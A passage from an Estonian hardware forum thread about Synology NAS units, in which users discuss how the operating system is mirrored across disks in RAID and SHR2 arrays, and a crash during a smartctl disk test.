Mis driveplan on ? jbodi ja peegli puhul hoiab ta iga ketta peal bootloaderit ja os'i koopiat. Kui see ketas, millelt üles booditi, ära sureb, on loogiline jätk, et kast kokku jookseb.
tagasi üles
vaata kasutaja infot saada privaatsõnum
pppd
Kreisi kasutaja

liitunud: 21.06.2004




sõnum 02.08.2017 08:50:08 vasta tsitaadiga

Markos kirjutas:
Mis driveplan on ? jbodi ja peegli puhul hoiab ta iga ketta peal bootloaderit ja os'i koopiat. Kui see ketas, millelt üles booditi, ära sureb, on loogiline jätk, et kast kokku jookseb.

mitte ainult jbod ja mirrori, vaid ka raid5 või raid6 puhul peaks os olema peegeldatud kõikide ketaste peale. suure kasti kõhust on tore vaadata, kuidas md0 on 12-way mirror icon_smile.gif Ehk siis, nii kaua kuni vähemalt üks ketas veel kastis töötab, peaks os-i partitsioon toimiv olema.
tagasi üles
vaata kasutaja infot saada privaatsõnum
Markos
HV veteran

liitunud: 10.04.2002




sõnum 02.08.2017 08:57:14 vasta tsitaadiga

Küllap ta nii on jah, pole kõrgemaid leveleid ja hybridi lähemalt uurinud.
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 02.08.2017 10:16:42 vasta tsitaadiga

Markos kirjutas:
Mis driveplan on ? jbodi ja peegli puhul hoiab ta iga ketta peal bootloaderit ja os'i koopiat. Kui see ketas, millelt üles booditi, ära sureb, on loogiline jätk, et kast kokku jookseb.


SHR2, a.k.a RAID6 ehk siis jah, iga ketta peal on OS, Swap, jne...bootloader on AFAIK eraldi flashil neil...

pppd kirjutas:
Ehk siis, nii kaua kuni vähemalt üks ketas veel kastis töötab, peaks os-i partitsioon toimiv olema.


Nii peaks olema jah...
Huvitav on muidugi see, et kast viskas lusika nurka smartctl'i peale...mis jäi 10% peale rippuma sellel kettal.
Võimalik et ka see on "tavaline", ise pole kunagi varem sellist asja kohanud muidugi... icon_rolleyes.gif

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
näita postitusi alates eelmisest:   
uus teema   vasta Hinnavaatlus »  Serverid / Andmemassiivid / Tulemüürid »  Synology arutelu mine lehele eelmine  1, 2, 3 ... 25, 26, 27 ... 56, 57, 58  järgmine
[vaata eelmist teemat] [vaata järgmist teemat]
 lisa lemmikuks
näita foorumit:  
 ignoreeri teemat 
sa ei või postitada uusi teemasid siia foorumisse
sa ei või vastata selle foorumi teemadele
sa ei või muuta oma postitusi selles foorumis
sa ei või kustutada oma postitusi selles foorumis
sa ei või vastata küsitlustele selles foorumis
sa ei saa lisada manuseid selles foorumis
sa võid manuseid alla laadida selles foorumis



Hinnavaatlus ei vastuta foorumis tehtud postituste eest.